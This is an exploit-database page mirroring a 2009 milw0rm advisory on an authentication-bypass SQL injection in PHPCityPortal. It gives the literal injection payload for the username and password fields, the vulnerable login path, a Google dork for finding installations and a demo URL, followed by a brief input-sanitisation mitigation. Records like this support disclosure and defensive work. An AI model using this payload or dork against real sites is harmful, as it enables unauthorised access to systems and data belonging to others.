header-logo
Suggest Exploit
vendor:
PHPCityPortal
by:
CoBRa_21
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPCityPortal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPCityPortal (Auth Bypass) SQL Injection Vulnerability

An authentication bypass vulnerability exists in PHPCityPortal. An attacker can exploit this vulnerability to bypass authentication by entering 'or' as the username and password. This will allow the attacker to gain access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
 
Author:   CoBRa_21
 
Mail:    uyku_cu@windowslive.com
 
Script Page:  http://phpcityportal.com/
 
DOrk:    intext:"Powered by PHPCityPortal.com"
 
******************************************************************************************
EXPLOIT
 
Username: 'or'
 
Password: 'or'
 
http://localhost/[path]/login.php
 
Demo: http://phpcityportal.com/demo/login.php
 
******************************************************************************************

# milw0rm.com [2009-08-07]

Navigation

Suggest Exploit

Services By CQR